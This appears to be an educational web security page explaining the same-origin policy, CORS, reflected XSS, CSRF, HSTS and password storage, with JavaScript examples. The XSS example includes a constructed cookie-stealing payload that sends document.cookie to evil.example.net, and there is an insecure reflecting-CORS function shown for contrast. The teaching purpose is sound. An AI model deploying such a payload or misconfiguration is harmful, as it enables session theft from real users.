An origin is defined as the combination of URI scheme, host name, and port number; two URLs have the same origin only if all three match. The Same Origin Policy prevents scripts loaded from one origin from reading data belonging to documents and resources from another origin. In other words, this policy prevents a malicious script on one page from obtaining access to sensitive data on another web page through that page’s Document Object Model.

Cross-Origin Resource Sharing
The second technique for relaxing the same-origin policy is standardized under the name Cross-Origin Resource Sharing (CORS). This standard extends HTTP with a new Origin request header and a new Access-Control-Allow-Origin response header. It allows servers to…
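To make the Origin / Access-Control-Allow-Origin exchange concrete, here is an added server-side example (it is not code from the page or from any project it links to). The allow-list, host names and request shapes are constructed for illustration; the point is that the server compares the full scheme+host+port origin exactly, echoes only a trusted origin (never `*` with credentials), and sets `Vary: Origin` so caches do not serve one client's answer to another.

```javascript
// Added example: a CORS allow-list decision. ALLOWED_ORIGINS and the request
// headers used with it are constructed for this example.

// An origin is scheme + host + port and is compared as an exact string:
// "https://app.example.com" does not match "https://app.example.com:8443"
// or "http://app.example.com".
const ALLOWED_ORIGINS = new Set([
  'https://app.example.com',
  'https://admin.example.com:8443',
]);

// Normalise an Origin header value to scheme://host[:port] so that a path,
// odd casing or an explicit default port cannot slip past the exact
// comparison. Returns null for values that are not a usable origin, including
// the literal "null" that sandboxed frames and file:// pages send.
function normalizeOrigin(value) {
  if (typeof value !== 'string' || value === 'null') return null;
  let u;
  try { u = new URL(value); } catch { return null; }
  if (u.protocol !== 'https:' && u.protocol !== 'http:') return null;
  return u.origin; // serialised as scheme://host[:non-default port]
}

// Build the CORS response headers for one request. `headers` is the incoming
// request header map with lower-case keys; `method` is the HTTP method.
function corsHeaders(method, headers) {
  const origin = normalizeOrigin(headers['origin']);
  // Caches must key on Origin, otherwise an allowed origin's response could be
  // served to a request from a disallowed one (or vice versa).
  const out = { 'Vary': 'Origin' };
  if (origin === null || !ALLOWED_ORIGINS.has(origin)) {
    return out; // no Access-Control-Allow-Origin: the browser blocks the cross-origin read
  }
  // Echo the specific trusted origin. "*" is not allowed together with
  // credentials and would expose authenticated responses to every site.
  out['Access-Control-Allow-Origin'] = origin;
  out['Access-Control-Allow-Credentials'] = 'true';
  if (method === 'OPTIONS' && headers['access-control-request-method']) {
    // Preflight: state exactly what is permitted and let the browser cache it.
    out['Access-Control-Allow-Methods'] = 'GET, POST';
    out['Access-Control-Allow-Headers'] = 'Content-Type, Authorization';
    out['Access-Control-Max-Age'] = '600';
  }
  return out;
}

// The common misconfiguration, for contrast: reflecting whatever Origin
// arrives while also allowing credentials makes every site on the web a
// trusted caller of the authenticated API.
function insecureReflectingCors(headers) {
  return {
    'Access-Control-Allow-Origin': headers['origin'],
    'Access-Control-Allow-Credentials': 'true',
  };
}
```

`corsHeaders('GET', { origin: 'https://evil.example.net' })` yields only the `Vary` header, so the browser refuses to hand the response body to the calling script, while the reflecting variant would happily allow it.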
Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

Non-persistent (reflected) XSS: these are usually the most common type. Typically the payload is carried in HTTP query parameters and is used by…
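The reflected case above, as an added example that is not code from the page: a search handler that echoes the `q` query parameter into its HTML, shown first as the vulnerable concatenation and then with the user input entity-encoded for the HTML body and attribute contexts it lands in. The site name, template and attack URL are constructed for illustration.

```javascript
// Added example: reflected XSS via a query parameter, vulnerable and fixed.
// The template and ATTACK_URL below are constructed for this example.

// Entity-encode for the HTML element body and quoted-attribute contexts.
// All five characters matter: " and ' end attribute values, < and > start
// tags, and & starts an entity that could undo an earlier encoding step.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Pull "q" out of the request URL the way a handler would.
function searchTerm(requestUrl) {
  return new URL(requestUrl).searchParams.get('q') ?? '';
}

// Vulnerable: user input is concatenated into the HTML output unencoded, in
// two contexts (element body and a double-quoted attribute value).
function renderSearchVulnerable(requestUrl) {
  const q = searchTerm(requestUrl);
  return `<p>Results for: ${q}</p>\n<input name="q" value="${q}">`;
}

// Fixed: every interpolation of user input is encoded for its output context.
// Both contexts here are covered by HTML entity encoding; a JavaScript or URL
// context would need its own encoder.
function renderSearchSafe(requestUrl) {
  const q = escapeHtml(searchTerm(requestUrl));
  return `<p>Results for: ${q}</p>\n<input name="q" value="${q}">`;
}

// Crude detector used to compare the two renderers: is there a script tag or
// an event-handler attribute in the output that the template did not contain?
function containsInjectedScript(html) {
  return /<script\b|\son\w+\s*=/i.test(html);
}

// Constructed attacker URL: the payload closes the attribute, then injects a
// script that ships the victim's cookies to a server the attacker controls.
const ATTACK_URL =
  'https://shop.example.com/search?q=' +
  encodeURIComponent('"><script>document.location="https://evil.example.net/?c="+document.cookie</script>');
```

Running `renderSearchVulnerable(ATTACK_URL)` returns a page with a live `<script>` element, which is exactly what the victim's browser would execute after clicking the attacker's link; `renderSearchSafe` returns the same text with the payload rendered inert as `&lt;script&gt;…`.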
CSRF is an attack that tricks the victim into submitting a malicious request. It inherits the identity and privileges of the victim to perform an undesired function on the victim’s behalf. For most sites, browser requests automatically include any credentials associated with the site, such as the user’s session cookie, IP address, Windows domain credentials, and so forth. Therefore, if the user is currently authenticated to the site, the site will have no way to distinguish between a forged request sent by the victim’s browser and a legitimate request the victim intended to send, unless the request carries something the attacker cannot obtain, such as a per-session token. Read more: OWASP – CSRF, CSRF CWE
HTTP Strict Transport Security (HSTS) is an opt-in security enhancement that is specified by a web application through the use of a special response header (Strict-Transport-Security). Once a supported browser receives this header, that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS. The header is only honoured when it arrives over a valid HTTPS connection, and only for the period given by its max-age directive, so a user’s very first visit to a domain remains unprotected unless the domain is on the browsers’ preload list. Read more: OWASP – HSTS Cheatsheet,
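To show what the browser actually does with the header, here is an added example (not code from the page or from any browser): a parser for the Strict-Transport-Security directives and a small in-memory version of the browser's HSTS store that records policies only from HTTPS responses, honours includeSubDomains and expiry, and rewrites http:// navigations to https://. Host names, header values and the clock values are constructed for illustration.

```javascript
// Added example: browser-side handling of Strict-Transport-Security.
// The hosts, header values and timestamps used with it are constructed.

// Parse "max-age=31536000; includeSubDomains; preload" into its directives.
// Returns null when there is no valid max-age, since the browser ignores such
// a header. Unknown directives are ignored, as RFC 6797 requires.
function parseHsts(headerValue) {
  const entry = { maxAge: null, includeSubDomains: false, preload: false };
  for (const raw of String(headerValue).split(';')) {
    const [name, value] = raw.trim().split('=').map((s) => s.trim());
    switch (name.toLowerCase()) {
      case 'max-age':
        if (/^\d+$/.test(value ?? '')) entry.maxAge = Number(value);
        break;
      case 'includesubdomains': entry.includeSubDomains = true; break;
      case 'preload': entry.preload = true; break;
      default: break;
    }
  }
  return entry.maxAge === null ? null : entry;
}

// In-memory stand-in for the browser's HSTS store: host -> policy.
class HstsStore {
  constructor() { this.policies = new Map(); }

  // Record a policy from a response. Only responses received over HTTPS are
  // trusted: an HTTP response could have been injected by the very network
  // attacker HSTS defends against. max-age=0 tells the browser to forget the
  // host. Returns true when the store changed.
  record(host, responseScheme, headerValue, now) {
    if (responseScheme !== 'https') return false;
    const parsed = parseHsts(headerValue);
    if (parsed === null) return false;
    if (parsed.maxAge === 0) { this.policies.delete(host); return true; }
    this.policies.set(host, {
      expires: now + parsed.maxAge * 1000,
      includeSubDomains: parsed.includeSubDomains,
    });
    return true;
  }

  // Is `host` covered by a non-expired policy, either directly or through a
  // parent domain whose policy has includeSubDomains?
  isKnown(host, now) {
    const labels = host.split('.');
    for (let i = 0; i < labels.length - 1; i++) {
      const candidate = labels.slice(i).join('.');
      const p = this.policies.get(candidate);
      if (!p || p.expires <= now) continue;
      if (i === 0 || p.includeSubDomains) return true;
    }
    return false;
  }

  // Rewrite an http:// navigation to https:// when the host is known; the
  // browser never sends the plaintext request at all.
  upgrade(urlString, now) {
    const u = new URL(urlString);
    if (u.protocol === 'http:' && this.isKnown(u.hostname, now)) {
      u.protocol = 'https:';
    }
    return u.toString();
  }
}
```

Note the two caveats the store makes visible: a policy delivered over plain HTTP is dropped, and once `expires` passes the host is treated as unknown again, which is why sites are advised to send a long max-age on every HTTPS response.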
Responsibilities of systems processing passwords
– Passwords must be masked, never displayed, when entered.
– Passwords must never be stored in clear, readable form; only a salted hash produced by a slow, purpose-built password hashing function may be stored. This is hashing, not reversible encryption: the system must not be able to recover the password.
– Stored password hashes must never be accessible to unauthorized individuals.
– Where possible, salted hashes should be used: a random per-user salt makes identical passwords hash differently and defeats precomputed (rainbow-table) attacks.

Password requirements
– At least eight (8) characters, using a combination of at least one character from each of the following four character types:
— uppercase letters (A-Z)
— lowercase letters (a-z)
— base 10 digits (0-9)
— non-alphanumeric (such as ` ~ ! @ # $…
CERTCOOP: http://certcoop.eu/
OWASP Top 10 Most Critical Web Application Security Risks (2017): OWASP top 10 – 2017
CWE/SANS TOP 25 Most Dangerous Software Errors: CWE/SANS TOP 25
Securing PHP web applications: https://php.earth/docs/security/intro
Network forensics: Infosec – Network forensics, ENISA training for network forensics